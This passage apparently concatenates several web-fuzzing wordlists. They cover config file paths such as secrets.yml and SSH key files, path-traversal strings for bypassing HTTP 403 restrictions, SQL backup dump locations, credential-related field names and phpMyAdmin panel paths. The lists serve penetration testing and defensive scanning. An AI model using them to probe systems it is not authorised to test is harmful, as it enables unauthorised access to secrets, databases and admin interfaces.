/bamboo-specs/bamboo.yml 37 | /bamboo.yml 38 | /buddy.yml 39 | /buildkite.yml 40 | /ci/distelli-manifest.yml 41 | /ci/distelli.yml 42 | /ci/phpci.yml 43 | /ci/pipeline.yml 44 | /ci/push_ssh_keys_remote.yml 45 | /ci/push_ssh_keys.yml 46 | /ci/solano.yml 47 | /circle.yml 48 | /cloud-provider.yaml 49 | /codefresh.yml 50 | /codeship-services.yml 51 | /codeship.yml 52 | /conf/push_ssh_keys_remote.yml 53 | /conf/push_ssh_keys.yml 54 | /conf/solano.yml 55 | /config.yml 56 | /config/cable.yml 57 | /config/cucumber.yml 58 | /config/database.yml 59 | /config/databases.yml 60 | /config/locales/devise.en.yml 61 | /config/locales/en.yml 62 | /config/locales/ja.yml 63 | /config/locales/simple_form.en.yml 64 | /config/newrelic.yml 65 | /config/parameters.yml 66 | /config/push_ssh_keys_remote.yml 67 | /config/push_ssh_keys.yml 68 | /config/s3.yml 69 | /config/secrets.yml 70 | /config/solano.yml 71 | /database.yml 72 | /databases.yml 73 | /de.yml 74 | /distelli-manifest.yml 75 | /distelli.yml 76 | /docker-compose.yml 77 | /docs/_config.yml 78 | /en.yml 79 | /es.yml 80 | /fr.yml 81 | /keys.yml 82 | /lgtm.yml 83 | /meta/main.yml 84 | /nl.yml 85 | /parameters.yml 86 | /phinx.yml 87 | /phpci.yml 88 | /pipeline.yml 89 | /push_ssh_keys_remote.yml 90 | /push_ssh_keys.yml 91 | /pv-recycler-template.yaml 92 | /Resources/config/services.yml 93 | /ru.yml 94 | /s3.yml 95 | /scrutinizer.yml 96 | /semaphore.yml 97 | /shippable.yml 98 | /solano.yml 99 | /spec/dummy/config/database.yml 100 | /spec/dummy/config/locales/en.yml 101 | /spec/dummy/config/secrets.yml 102 | /src/main/resources/config.yml 103 | /tasks/main.yml 104 | /test/dummy/config/database.yml 105 | /test/dummy/config/locales/en.yml 106 | /test/dummy/config/secrets.yml 107 | /test/fixtures/users.yml 108 | /users.yml 109 | /wercker.yml 110 | /wp-cli.local.yml 111 | /wp-cli.yml 112 | -------------------------------------------------------------------------------- /api-actions.txt: -------------------------------------------------------------------------------- 1 | accelerate 2 | Accelerate 3 | acquire 4 | Acquire 5 | activate 6 | Activate 7 | adapt 8 | Adapt 9 | add 10 | Add 11 | adjust 12 | Adjust 13 | admin 14 | Admin 15 | alert 16 | Alert 17 | annotate 18 | Annotate 19 | anticipate 20 | Anticipate 21 | apply 22 | Apply 23 | arrange 24 | Arrange 25 | build 26 | Build 27 | calculate 28 | Calculate 29 | change 30 | Change 31 | claim 32 | Claim 33 | collect 34 | Collect 35 | Com 36 | comm 37 | communicate 38 | Communicate 39 | compare 40 | Compare 41 | complete 42 | Complete 43 | compose 44 | Compose 45 | compute 46 | Compute 47 | consolidate 48 | Consolidate 49 | construct 50 | Construct 51 | contact 52 | Contact 53 | create 54 | Create 55 | crush 56 | Crush 57 | damage 58 | Damage 59 | def 60 | Def 61 | define 62 | Define 63 | del 64 | Del 65 | deliver 66 | Deliver 67 | demo 68 | Demo 69 | demonstrate 70 | Demonstrate 71 | dequeue 72 | Dequeue 73 | derive 74 | Derive 75 | design 76 | Design 77 | destroy 78 | Destroy 79 | detect 80 | Detect 81 | dev 82 | Dev 83 | develop 84 | Develop 85 | devise 86 | Devise 87 | disable 88 | Disable 89 | display 90 | Display 91 | divide 92 | Divide 93 | doFor 94 | DoFor 95 | download 96 | Download 97 | enable 98 | Enable 99 | explode 100 | Explode 101 | fabricate 102 | Fabricate 103 | fashion 104 | Fashion 105 | forge 106 | Forge 107 | form 108 | Form 109 | generate 110 | Generate 111 | get 112 | Get 113 | go 114 | Go 115 | group 116 | Group 117 | improve 118 | Improve 119 | inform 120 | Inform 121 | inquiry 122 | Inquiry 123 | interpret 124 | Interpret 125 | kill 126 | Kill 127 | latest 128 | Latest 129 | level 130 | Level 131 | link 132 | Link 133 | list 134 | List 135 | make 136 | Make 137 | map 138 | Map 139 | mod 140 | Mod 141 | multiply 142 | Multiply 143 | originate 144 | Originate 145 | picture 146 | Picture 147 | post 148 | Post 149 | preserve 150 | Preserve 151 | produce 152 | Produce 153 | promote 154 | Promote 155 | put 156 | Put 157 | queue 158 | Queue 159 | quit 160 | Quit 161 | reactivate 162 | Reactivate 163 | read 164 | Read 165 | recite 166 | Recite 167 | record 168 | Record 169 | recursive 170 | Recursive 171 | register 172 | Register 173 | remove 174 | Remove 175 | restore 176 | Restore 177 | restrict 178 | Restrict 179 | retrieve 180 | Retrieve 181 | run 182 | Run 183 | select 184 | Select 185 | set 186 | Set 187 | setup 188 | Setup 189 | show 190 | Show 191 | sleep 192 | Sleep 193 | split 194 | Split 195 | start 196 | Start 197 | stop 198 | Stop 199 | study 200 | Study 201 | sub 202 | Sub 203 | terminate 204 | Terminate 205 | test 206 | Test 207 | understand 208 | Understand 209 | undo 210 | Undo 211 | unqueue 212 | Unqueue 213 | update 214 | Update 215 | upload 216 | Upload 217 | upset 218 | Upset 219 | Validate 220 | validate 221 | Verify 222 | verify 223 | -------------------------------------------------------------------------------- /403_url_payloads.txt: -------------------------------------------------------------------------------- 1 | # 2 | #? 3 | %09 4 | %09%3b 5 | %09.. 6 | %09; 7 | %20 8 | %23 9 | %23%3f 10 | %252f%252f 11 | %252f/ 12 | %2e%2e 13 | %2e%2e/ 14 | %2f 15 | %2f%20%23 16 | %2f%23 17 | %2f%2f 18 | %2f%3b%2f 19 | %2f%3b%2f%2f 20 | %2f%3f 21 | %2f%3f/ 22 | %2f/ 23 | %2f;? 24 | %2f?; 25 | %3b 26 | %3b%09 27 | %3b%2f%2e%2e 28 | %3b%2f%2e%2e%2f%2e%2e%2f%2f 29 | %3b%2f%2e. 30 | %3b%2f.. 31 | %3b/%2e%2e/..%2f%2f 32 | %3b/%2e. 33 | %3b/%2f%2f../ 34 | %3b/.. 35 | %3b//%2f../ 36 | %3f%23 37 | %3f%3f 38 | %3f.php 39 | .. 40 | ..%00/ 41 | ..%00/; 42 | ..%00;/ 43 | ..%09 44 | ..%0d/ 45 | ..%0d/; 46 | ..%0d;/ 47 | ..%5c/ 48 | ..%ff/ 49 | ..%ff/; 50 | ..%ff;/ 51 | ../ 52 | ..;%00/ 53 | ..;%0d/ 54 | ..;%ff/ 55 | ..;\ 56 | ..;\; 57 | ..\ 58 | ..\; 59 | .html 60 | .json 61 | / 62 | /# 63 | /%20 64 | /%20# 65 | /%20%23 66 | /%23 67 | /%252e%252e%252f/ 68 | /%252e%252e%253b/ 69 | /%252e%252f/ 70 | /%252e%253b/ 71 | /%252e/ 72 | /%252f 73 | /%2e%2e 74 | /%2e%2e%2f/ 75 | /%2e%2e%3b/ 76 | /%2e%2e/ 77 | /%2e%2f/ 78 | /%2e%3b/ 79 | /%2e%3b// 80 | /%2e/ 81 | /%2e// 82 | /%2f 83 | /%3b/ 84 | /.. 85 | /..%2f 86 | /..%2f..%2f 87 | /..%2f..%2f..%2f 88 | /../ 89 | /../../ 90 | /../../../ 91 | /../../..// 92 | /../..// 93 | /../..//../ 94 | /../..;/ 95 | /.././../ 96 | /../.;/../ 97 | /..// 98 | /..//../ 99 | /..//../../ 100 | /..//..;/ 101 | /../;/ 102 | /../;/../ 103 | /..;%2f 104 | /..;%2f..;%2f 105 | /..;%2f..;%2f..;%2f 106 | /..;/ 107 | /..;/../ 108 | /..;/..;/ 109 | /..;// 110 | /..;//../ 111 | /..;//..;/ 112 | /..;/;/ 113 | /..;/;/..;/ 114 | /./ 115 | /.// 116 | /.;/ 117 | /.;// 118 | // 119 | //.. 120 | //../../ 121 | //..; 122 | //./ 123 | //.;/ 124 | ///.. 125 | ///../ 126 | ///..// 127 | ///..; 128 | ///..;/ 129 | ///..;// 130 | //;/ 131 | /;/ 132 | /;// 133 | /;? 134 | /;x 135 | /;x/ 136 | /? 137 | /?; 138 | /x/../ 139 | /x/..// 140 | /x/../;/ 141 | /x/..;/ 142 | /x/..;// 143 | /x/..;/;/ 144 | /x//../ 145 | /x//..;/ 146 | /x/;/../ 147 | /x/;/..;/ 148 | ; 149 | ;%09 150 | ;%09.. 151 | ;%09..; 152 | ;%09; 153 | ;%2F.. 154 | ;%2f%2e%2e 155 | ;%2f%2e%2e%2f%2e%2e%2f%2f 156 | ;%2f%2f/../ 157 | ;%2f.. 158 | ;%2f..%2f%2e%2e%2f%2f 159 | ;%2f..%2f..%2f%2f 160 | ;%2f..%2f/ 161 | ;%2f..%2f/..%2f 162 | ;%2f..%2f/../ 163 | ;%2f../%2f..%2f 164 | ;%2f../%2f../ 165 | ;%2f..//..%2f 166 | ;%2f..//../ 167 | ;%2f../// 168 | ;%2f..///; 169 | ;%2f..//;/ 170 | ;%2f..//;/; 171 | ;%2f../;// 172 | ;%2f../;/;/ 173 | ;%2f../;/;/; 174 | ;%2f..;/// 175 | ;%2f..;//;/ 176 | ;%2f..;/;// 177 | ;%2f/%2f../ 178 | ;%2f//..%2f 179 | ;%2f//../ 180 | ;%2f//..;/ 181 | ;%2f/;/../ 182 | ;%2f/;/..;/ 183 | ;%2f;//../ 184 | ;%2f;/;/..;/ 185 | ;/%2e%2e 186 | ;/%2e%2e%2f%2f 187 | ;/%2e%2e%2f/ 188 | ;/%2e%2e/ 189 | ;/%2e. 190 | ;/%2f%2f../ 191 | ;/%2f/..%2f 192 | ;/%2f/../ 193 | ;/.%2e 194 | ;/.%2e/%2e%2e/%2f 195 | ;/.. 196 | ;/..%2f 197 | ;/..%2f%2f../ 198 | ;/..%2f..%2f 199 | ;/..%2f/ 200 | ;/..%2f// 201 | ;/../ 202 | ;/../%2f/ 203 | ;/../../ 204 | ;/../..// 205 | ;/.././../ 206 | ;/../.;/../ 207 | ;/..// 208 | ;/..//%2e%2e/ 209 | ;/..//%2f 210 | ;/..//../ 211 | ;/../// 212 | ;/../;/ 213 | ;/../;/../ 214 | ;/..; 215 | ;/.;. 216 | ;//%2f../ 217 | ;//.. 218 | ;//../../ 219 | ;///.. 220 | ;///../ 221 | ;///..// 222 | ;? 223 | ;x 224 | ;x/ 225 | ;x; 226 | ? 227 | ?# 228 | ?.php 229 | ?; 230 | ?? 231 | /// 232 | /%2f/ 233 | //%2f 234 | %2f/%2f 235 | %2f%2f%2f 236 | %2f// 237 | -------------------------------------------------------------------------------- /css_all_properties.txt: -------------------------------------------------------------------------------- 1 | align-content 2 | align-items 3 | align-self 4 | all 5 | animation 6 | animation-delay 7 | animation-direction 8 | animation-duration 9 | animation-fill-mode 10 | animation-iteration-count 11 | animation-name 12 | animation-play-state 13 | animation-timing-function 14 | backface-visibility 15 | background 16 | background-clip 17 | background-origin 18 | background-size 19 | border-bottom-left-radius 20 | border-bottom-right-radius 21 | border-image 22 | border-image-outset 23 | border-image-repeat 24 | border-image-slice 25 | border-image-source 26 | border-image-width 27 | border-radius 28 | border-top-left-radius 29 | border-top-right-radius 30 | box-decoration-break 31 | box-shadow 32 | box-sizing 33 | caret-color 34 | clip-path 35 | column-count 36 | column-fill 37 | column-gap 38 | column-rule 39 | column-rule-color 40 | column-rule-style 41 | column-rule-width 42 | column-span 43 | column-width 44 | columns 45 | filter 46 | flex 47 | flex-basis 48 | flex-direction 49 | flex-flow 50 | flex-grow 51 | flex-shrink 52 | flex-wrap 53 | font-kerning 54 | font-size-adjust 55 | font-stretch 56 | hanging-punctuation 57 | hyphens 58 | isolation 59 | justify-content 60 | object-fit 61 | object-position 62 | opacity 63 | order 64 | outline-offset 65 | overflow-x 66 | overflow-y 67 | perspective 68 | perspective-origin 69 | pointer-events 70 | resize 71 | tab-size 72 | text-align-last 73 | text-decoration-color 74 | text-decoration-line 75 | text-decoration-style 76 | text-justify 77 | text-overflow 78 | text-shadow 79 | transform 80 | transform-origin 81 | transform-style 82 | transition 83 | transition-delay 84 | transition-duration 85 | transition-property 86 | transition-timing-function 87 | user-select 88 | word-break 89 | word-wrap 90 | writing-mode 91 | align-content 92 | align-items 93 | align-self 94 | all 95 | animation 96 | animation-delay 97 | animation-direction 98 | animation-duration 99 | animation-fill-mode 100 | animation-iteration-count 101 | animation-name 102 | animation-play-state 103 | animation-timing-function 104 | backface-visibility 105 | background 106 | background-clip 107 | background-origin 108 | background-size 109 | border-bottom-left-radius 110 | border-bottom-right-radius 111 | border-image 112 | border-image-outset 113 | border-image-repeat 114 | border-image-slice 115 | border-image-source 116 | border-image-width 117 | border-radius 118 | border-top-left-radius 119 | border-top-right-radius 120 | box-decoration-break 121 | box-shadow 122 | box-sizing 123 | caret-color 124 | column-count 125 | column-fill 126 | column-gap 127 | column-rule 128 | column-rule-color 129 | column-rule-style 130 | column-rule-width 131 | column-span 132 | column-width 133 | columns 134 | filter 135 | flex 136 | flex-basis 137 | flex-direction 138 | flex-flow 139 | flex-grow 140 | flex-shrink 141 | flex-wrap 142 | font-kerning 143 | font-size-adjust 144 | font-stretch 145 | hanging-punctuation 146 | hyphens 147 | isolation 148 | justify-content 149 | object-fit 150 | object-position 151 | opacity 152 | order 153 | outline-offset 154 | overflow-x 155 | overflow-y 156 | perspective 157 | perspective-origin 158 | pointer-events 159 | resize 160 | tab-size 161 | text-align-last 162 | text-decoration-color 163 | text-decoration-line 164 | text-decoration-style 165 | text-justify 166 | text-overflow 167 | text-shadow 168 | transform 169 | transform-origin 170 | transform-style 171 | transition 172 | transition-delay 173 | transition-duration 174 | transition-property 175 | transition-timing-function 176 | user-select 177 | word-break 178 | word-wrap 179 | writing-mode 180 | -------------------------------------------------------------------------------- /sql.txt: -------------------------------------------------------------------------------- 1 | /1.sql 2 | /12052019.sql 3 | /2.sql 4 | /2012.sql 5 | /2013.sql 6 | /2014.sql 7 | /2015.sql 8 | /2016.sql 9 | /2017.sql 10 | /2018.sql 11 | /2019.sql 12 | /accounts.sql 13 | /admin/download/backup.sql 14 | /adminer.sql 15 | /adodb-sessions.oracle.clob.sql 16 | /b.sql 17 | /back.sql 18 | /backup_db.sql 19 | /backup.sql 20 | /backup/data.sql 21 | /backup/database.sql 22 | /backup/db_backup.sql 23 | /backup/db.sql 24 | /backup/dbdump.sql 25 | /backup/dump.sql 26 | /backup/mysql.sql 27 | /backup/site.sql 28 | /backup/wordpress.sql 29 | /backup2018.sql 30 | /backups.sql 31 | /backups/data.sql 32 | /backups/database.sql 33 | /backups/db_backup.sql 34 | /backups/db.sql 35 | /backups/dbdump.sql 36 | /backups/dump.sql 37 | /backups/mysql.sql 38 | /backups/site.sql 39 | /backups/wordpress.sql 40 | /base.dump.sql 41 | /base.sql 42 | /bdb.sql 43 | /bill/install/mysql.sql 44 | /blog.sql 45 | /board/acp/lib/inserts.sql 46 | /cgi-bin/acp/lib/inserts.sql 47 | /clients.sql 48 | /contact.sql 49 | /copy.sql 50 | /data.sql 51 | /data.sql.sql 52 | /database_backup.sql 53 | /database.sql 54 | /database/structure.sql 55 | /db_acl.sql 56 | /db_backup.sql 57 | /db_backup.sql.sql 58 | /db.sql 59 | /db.sql.sql 60 | /db/dump.sql 61 | /dbadmin.sql 62 | /dbadmin.sql.sql 63 | /dbase.sql 64 | /dbase.sql.sql 65 | /dbdump.sql 66 | /ddb.sql 67 | /demo/zh_cn.sql 68 | /drop.sql 69 | /drupalbackup.sql 70 | /dump 71 | /dump.sql 72 | /emails.sql 73 | /error_report/install/mysql.sql 74 | /export.sql 75 | /file.sql 76 | /files.sql 77 | /forum/acp/lib/inserts.sql 78 | /fullbackup.sql 79 | /fullwebsite.sql 80 | /home.sql 81 | /home.sql.sql 82 | /install.sql 83 | /install/data/data_en_us.sql 84 | /Install/Demo/Demo.sql 85 | /lib.model.schema.sql 86 | /localhost_backup.sql 87 | /localhost.sql 88 | /mails.sql 89 | /main.sql 90 | /message/install/mysql.sql 91 | /module/info/include/mysql/phpcms_info.sql 92 | /my.sql 93 | /mysql_basic.sql 94 | /mysql.sql 95 | /mysqldump.sql 96 | /old.sql 97 | /opencart.sql 98 | /phpbb_db_backup_data.sql 99 | /phpmyadmin.sql 100 | /pma.sql 101 | /scripts/acp/lib/inserts.sql 102 | /server.sql 103 | /sessions.sql 104 | /site.sql 105 | /spider/uninstall/mysql.sql 106 | /sql.sql 107 | /structure.sql 108 | /tables.sql 109 | /temp.sql 110 | /test.sql 111 | /tests/_data/dump.sql 112 | /transfer/drupalbackup.sql 113 | /upload.sql 114 | /users.sql 115 | /wbboard/acp/lib/inserts.sql 116 | /web.sql 117 | /website.sql 118 | /wordpress.sql 119 | /wp-content/backup/data.sql 120 | /wp-content/backup/database.sql 121 | /wp-content/backup/db_backup.sql 122 | /wp-content/backup/db.sql 123 | /wp-content/backup/dbdump.sql 124 | /wp-content/backup/dump.sql 125 | /wp-content/backup/mysql.sql 126 | /wp-content/backup/site.sql 127 | /wp-content/backup/wordpress.sql 128 | /wp-content/backups/data.sql 129 | /wp-content/backups/database.sql 130 | /wp-content/backups/db_backup.sql 131 | /wp-content/backups/db.sql 132 | /wp-content/backups/dbdump.sql 133 | /wp-content/backups/dump.sql 134 | /wp-content/backups/mysql.sql 135 | /wp-content/backups/site.sql 136 | /wp-content/backups/wordpress.sql 137 | /wp-content/data.sql 138 | /wp-content/database.sql 139 | /wp-content/db_backup.sql 140 | /wp-content/db.sql 141 | /wp-content/dbdump.sql 142 | /wp-content/dump.sql 143 | /wp-content/fullbackup.sql 144 | /wp-content/fullwebsite.sql 145 | /wp-content/mysql.sql 146 | /wp-content/site.sql 147 | /wp-content/uploads/data.sql 148 | /wp-content/uploads/database.sql 149 | /wp-content/uploads/db_backup.sql 150 | /wp-content/uploads/db.sql 151 | /wp-content/uploads/dbdump.sql 152 | /wp-content/uploads/dump.sql 153 | /wp-content/uploads/mysql.sql 154 | /wp-content/uploads/site.sql 155 | /wp-content/uploads/wordpress.sql 156 | /wp-content/wordpress.sql 157 | /wp.sql 158 | /wpbackup.sql 159 | /www.sql 160 | /zzfaq.sql 161 | -------------------------------------------------------------------------------- /user_field_names.txt: -------------------------------------------------------------------------------- 1 | Picture 2 | UserMiddleName 3 | SecretUserPassword 4 | EmployeePassphrase 5 | EmployeeSecretPasswordHash 6 | Username 7 | hash 8 | LoginKey 9 | LoginSecretPhrase 10 | mail 11 | EmployeeCountry 12 | UserSecretQuestion 13 | pwd 14 | MemberSecret 15 | UserPhoneNumber 16 | MemberSalt 17 | Image 18 | EmployeePassword 19 | UserTitle 20 | SercetHash 21 | IsFemale 22 | ImageId 23 | name 24 | PrivateEmail 25 | SecretSalt 26 | Description 27 | CertnetId 28 | EmployeeLogin 29 | MemberSecretKey 30 | EmployeeCity 31 | lang 32 | SubCompagnyCode 33 | UserDocumentId 34 | PrivatePassword 35 | EmployeePasswd 36 | SecretPasswordHash 37 | Email 38 | UserSecret 39 | UserPrivateEmail 40 | Passwd 41 | IsBanned 42 | LoginSecret 43 | SecretPasswordKey 44 | LoginHashedPassword 45 | MobileNumber 46 | HashedPassword 47 | UserPassHash 48 | UserSecretPasswordHash 49 | UserSecretLoginPhrase 50 | PhoneNumber 51 | Hash 52 | Passphrase 53 | UserId 54 | IsChild 55 | UserEmail 56 | LoginEmail 57 | PrivateKey 58 | MemberPasswd 59 | LanguageCode 60 | MailAddress 61 | UserDescription 62 | EmployeeSecretQuestion 63 | MobilePhone 64 | UserPhone 65 | compagny 66 | EmployeeStreet 67 | EmployeePass 68 | LoginSecretPassphrase 69 | LoginChallenge 70 | timezone 71 | id 72 | username 73 | JobTitle 74 | email 75 | Id 76 | EmployeeHashedPassword 77 | EmployeeHash 78 | PrivateSecretKey 79 | SecretId 80 | UserCity 81 | UserStreet 82 | UserGender 83 | EmployeeId 84 | SecretApiKey 85 | UserPasswordHash 86 | MemberPasswordHash 87 | UserCountry 88 | Mail 89 | PasswordHash 90 | UserPass 91 | MemberSecretPassword 92 | Pwd 93 | Secret 94 | EmployeePasswordHash 95 | PrivateMail 96 | lastname 97 | Street 98 | LoginPhrase 99 | passphrase 100 | secret 101 | TermsDescription 102 | SecretPassword 103 | EmployeeApiKey 104 | IsEnabled 105 | Mobile 106 | password 107 | UserMail 108 | EmployeeMail 109 | OfficeName 110 | Title 111 | SecretLoginPassword 112 | StreetNumber 113 | loginpass 114 | IsActive 115 | EmployeeTypeCode 116 | gender 117 | EmployeeName 118 | MemberSecretPasswordHash 119 | APIKEY 120 | IsConsultant 121 | LoginPassword 122 | Identity 123 | Address 124 | Gender 125 | LoginMail 126 | UserAddress 127 | SecretEmployeePassword 128 | SecretPhrase 129 | Pass 130 | country 131 | MemberSecretQuestion 132 | challenge 133 | JobTitleCode 134 | MemberPass 135 | IsMale 136 | identity 137 | City 138 | title 139 | UserName 140 | UserSecretPhrase 141 | UserMobileNumber 142 | PictureDocumentId 143 | EmployeeSecret 144 | EmployeeAddress 145 | image 146 | BranchCode 147 | city 148 | picture 149 | UserHashedPassword 150 | UserPassword 151 | PictureId 152 | PasswdHash 153 | LoginSecretKey 154 | language 155 | PrivatePassphrase 156 | Country 157 | PasswordKey 158 | Name 159 | street 160 | pass 161 | SecretKey 162 | UserSecretHash 163 | LoginPassphrase 164 | address 165 | code 166 | MemberPasswordKey 167 | ResetKey 168 | LoginSecretPasswordHash 169 | UserKey 170 | UserSecretPassword 171 | PublicKey 172 | UserShortName 173 | UserSalt 174 | UserPrivateKey 175 | UserHash 176 | UserChallenge 177 | UserPublicKey 178 | LoginSecretPassword 179 | EmployeeKey 180 | UserPrivateMail 181 | ApiKey 182 | ResetQuestion 183 | EmployeeSecretKey 184 | Challenge 185 | EmployeeSecretPassword 186 | SecretQuestion 187 | UserSecretKey 188 | IsSubContractor 189 | salt 190 | MiddleName 191 | shortname 192 | PasswordSalt 193 | FirstName 194 | EmployeeSecretApiKey 195 | Compagny 196 | description 197 | EmailAddress 198 | LoginName 199 | UserSecretChallenge 200 | EmployeeEmail 201 | UserLogin 202 | UserSecretSalt 203 | UseIdentity 204 | ImageDocumentId 205 | Language 206 | MemberPassword 207 | SecretMemberPassword 208 | IsAdult 209 | Code 210 | LoginUserName 211 | passwd 212 | MemberSecretHash 213 | LastName 214 | privatekey 215 | SecretPrivateKey 216 | IsMarried 217 | Password 218 | firstname 219 | UserCompagny 220 | PrivatePhrase 221 | LoginId 222 | UserApiKey 223 | EmployeePasswordKey 224 | TimeZone 225 | Salt 226 | employeePassHash 227 | LoginPass 228 | LoginPassHash 229 | -------------------------------------------------------------------------------- /phpmyadmin.txt: -------------------------------------------------------------------------------- 1 | /__phpMyAdmin/ 2 | /_phpmyadmin 3 | /_phpmyadmin/ 4 | /.phpmyadmin/ 5 | //phpmyadmin/ 6 | /1phpmyadmin/ 7 | /2phpmyadmin/ 8 | /3phpmyadmin/ 9 | /3rdparty/phpMyAdmin/ 10 | /4phpmyadmin/ 11 | /admin/phpmyadmin/ 12 | /admin/phpmyadmin2/ 13 | /administrator/components/com_joommyadmin/phpmyadmin/ 14 | /administrator/phpmyadmin/ 15 | /apache-default/phpmyadmin/ 16 | /backup/phpmyadmin/ 17 | /bkup/phpmyadmin/ 18 | /blog/phpmyadmin/ 19 | /claroline/phpMyAdmin/ 20 | /configuracion/phpmyadmin/ 21 | /cpanelphpmyadmin/ 22 | /cpphpmyadmin/ 23 | /db/myadmin/ 24 | /db/phpmyadmin/ 25 | /db/phpmyadmin3/ 26 | /forum/phpmyadmin/ 27 | /myadmin/ 28 | /myadmin2/ 29 | /myadminphp/ 30 | /openserver/phpmyadmin/ 31 | /php-myadmin/ 32 | /php/phpmyadmin/ 33 | /phpmyadmin 34 | /phpMyAdmin__/ 35 | /phpMyAdmin_111/ 36 | /phpMyAdmin_ai/ 37 | /phpmyadmin-/ 38 | /phpMyAdmin-2.10.0.0/ 39 | /phpMyAdmin-2.10.0.1/ 40 | /phpMyAdmin-2.10.0.2/ 41 | /phpMyAdmin-2.10.0/ 42 | /phpMyAdmin-2.10.1.0/ 43 | /phpMyAdmin-2.11.0.0/ 44 | /phpMyAdmin-2.11.1-all-languages/ 45 | /phpMyAdmin-2.11.1.0/ 46 | /phpMyAdmin-2.11.1.1/ 47 | /phpMyAdmin-2.11.1.2/ 48 | /phpMyAdmin-2.11.11.3/ 49 | /phpMyAdmin-2.11.11/ 50 | /phpMyAdmin-2.2.3/ 51 | /phpMyAdmin-2.2.6/ 52 | /phpMyAdmin-2.5.1/ 53 | /phpMyAdmin-2.5.4/ 54 | /phpMyAdmin-2.5.5-pl1/ 55 | /phpMyAdmin-2.5.5-rc1/ 56 | /phpMyAdmin-2.5.5-rc2/ 57 | /phpMyAdmin-2.5.5/ 58 | /phpMyAdmin-2.5.6-rc1/ 59 | /phpMyAdmin-2.5.6-rc2/ 60 | /phpMyAdmin-2.5.6/ 61 | /phpMyAdmin-2.5.7-pl1/ 62 | /phpMyAdmin-2.5.7/ 63 | /phpMyAdmin-2.6.0-alpha/ 64 | /phpMyAdmin-2.6.0-alpha2/ 65 | /phpMyAdmin-2.6.0-beta1/ 66 | /phpMyAdmin-2.6.0-beta2/ 67 | /phpMyAdmin-2.6.0-pl1/ 68 | /phpMyAdmin-2.6.0-pl2/ 69 | /phpMyAdmin-2.6.0-pl3/ 70 | /phpMyAdmin-2.6.0-rc1/ 71 | /phpMyAdmin-2.6.0-rc2/ 72 | /phpMyAdmin-2.6.0-rc3/ 73 | /phpMyAdmin-2.6.0/ 74 | /phpMyAdmin-2.6.1-pl1/ 75 | /phpMyAdmin-2.6.1-pl2/ 76 | /phpMyAdmin-2.6.1-pl3/ 77 | /phpMyAdmin-2.6.1-rc1/ 78 | /phpMyAdmin-2.6.1-rc2/ 79 | /phpMyAdmin-2.6.1/ 80 | /phpMyAdmin-2.6.2-beta1/ 81 | /phpMyAdmin-2.6.2-pl1/ 82 | /phpMyAdmin-2.6.2-rc1/ 83 | /phpMyAdmin-2.6.2/ 84 | /phpMyAdmin-2.6.3-pl1/ 85 | /phpMyAdmin-2.6.3-rc1/ 86 | /phpMyAdmin-2.6.3/ 87 | /phpMyAdmin-2.6.4-pl1/ 88 | /phpMyAdmin-2.6.4-pl2/ 89 | /phpMyAdmin-2.6.4-pl3/ 90 | /phpMyAdmin-2.6.4-pl4/ 91 | /phpMyAdmin-2.6.4-rc1/ 92 | /phpMyAdmin-2.6.4/ 93 | /phpMyAdmin-2.6.5/ 94 | /phpMyAdmin-2.6.9/ 95 | /phpMyAdmin-2.7.0-beta1/ 96 | /phpMyAdmin-2.7.0-pl1/ 97 | /phpMyAdmin-2.7.0-pl2/ 98 | /phpMyAdmin-2.7.0-rc1/ 99 | /phpMyAdmin-2.7.0/ 100 | /phpMyAdmin-2.7.5/ 101 | /phpMyAdmin-2.7.6/ 102 | /phpMyAdmin-2.7.7/ 103 | /phpMyAdmin-2.8.0-beta1/ 104 | /phpMyAdmin-2.8.0-rc1/ 105 | /phpMyAdmin-2.8.0-rc2/ 106 | /phpMyAdmin-2.8.0.1/ 107 | /phpMyAdmin-2.8.0.2/ 108 | /phpMyAdmin-2.8.0.3/ 109 | /phpMyAdmin-2.8.0.4/ 110 | /phpMyAdmin-2.8.0/ 111 | /phpMyAdmin-2.8.1-rc1/ 112 | /phpMyAdmin-2.8.1/ 113 | /phpMyAdmin-2.8.2.3/ 114 | /phpMyAdmin-2.8.2/ 115 | /phpMyAdmin-2.8.3/ 116 | /phpMyAdmin-2.8.5/ 117 | /phpMyAdmin-2.8.6/ 118 | /phpMyAdmin-2.8.7/ 119 | /phpMyAdmin-2.8.8/ 120 | /phpMyAdmin-2.8.9/ 121 | /phpMyAdmin-2.9.0-rc1/ 122 | /phpMyAdmin-2.9.0.1/ 123 | /phpMyAdmin-2.9.0.2/ 124 | /phpMyAdmin-2.9.0/ 125 | /phpMyAdmin-2.9.2/ 126 | /phpMyAdmin-2/ 127 | /phpMyAdmin-3.0.0.0-all-languages/ 128 | /phpMyAdmin-3.0.1.0-english/ 129 | /phpMyAdmin-3.0.1.0/ 130 | /phpMyAdmin-3.1.0.0-english/ 131 | /phpMyAdmin-3.1.0.0/ 132 | /phpMyAdmin-3.1.1.0-all-languages/ 133 | /phpMyAdmin-3.1.2.0-all-languages/ 134 | /phpMyAdmin-3.1.2.0-english/ 135 | /phpMyAdmin-3.1.2.0/ 136 | /phpMyAdmin-3.4.3.1/ 137 | /phpMyAdmin-4.4.0/ 138 | /phpmyadmin-old/ 139 | /phpMyAdmin._/ 140 | /phpMyAdmin._2/ 141 | /phpmyadmin.box25/ 142 | /phpMyAdmin.old/ 143 | /phpmyadmin/ 144 | /phpmyadmin/ 145 | /phpMyAdmin/%0D 146 | /phpmyadmin/admin/ 147 | /phpmyadmin/bad397/ 148 | /phpmyadmin/css/ 149 | /phpmyadmin/index.php 150 | /phpMyAdmin/phpmyadmin 151 | /phpmyadmin/phpmyadmin/ 152 | /phpMyAdmin+++---/ 153 | /phpmyadmin0/ 154 | /phpmyadmin1/ 155 | /phpmyadmin12/ 156 | /phpMyAdmin123/ 157 | /phpmyadmin2/ 158 | /phpmyadmin2011 159 | /phpmyadmin2011/ 160 | /phpmyadmin2012/ 161 | /phpmyadmin2013/ 162 | /phpmyadmin2014/ 163 | /phpmyadmin2015/ 164 | /phpmyadmin2016/ 165 | /phpmyadmin2017/ 166 | /phpmyadmin2018/ 167 | /phpmyadmin2222/ 168 | /phpmyadmin3/ 169 | /phpMyAdmin333/ 170 | /phpmyadmin3333/ 171 | /phpMyAdmin4.8.0/ 172 | /phpMyAdmin4.8.1/ 173 | /phpMyAdmin4.8.2/ 174 | /phpMyAdmin4.8.3/ 175 | /phpMyAdmin4.8.4/ 176 | /phpMyAdmin4.8.5/ 177 | /phpmyadmin4/ 178 | /phpmyadmin5/ 179 | /phpmyadmin6/ 180 | /phpmyadmin7/ 181 | /phpmyadminA/ 182 | /phpMyAdminhf/ 183 | /phpmyadminn/ 184 | /phpmyadmino/ 185 | 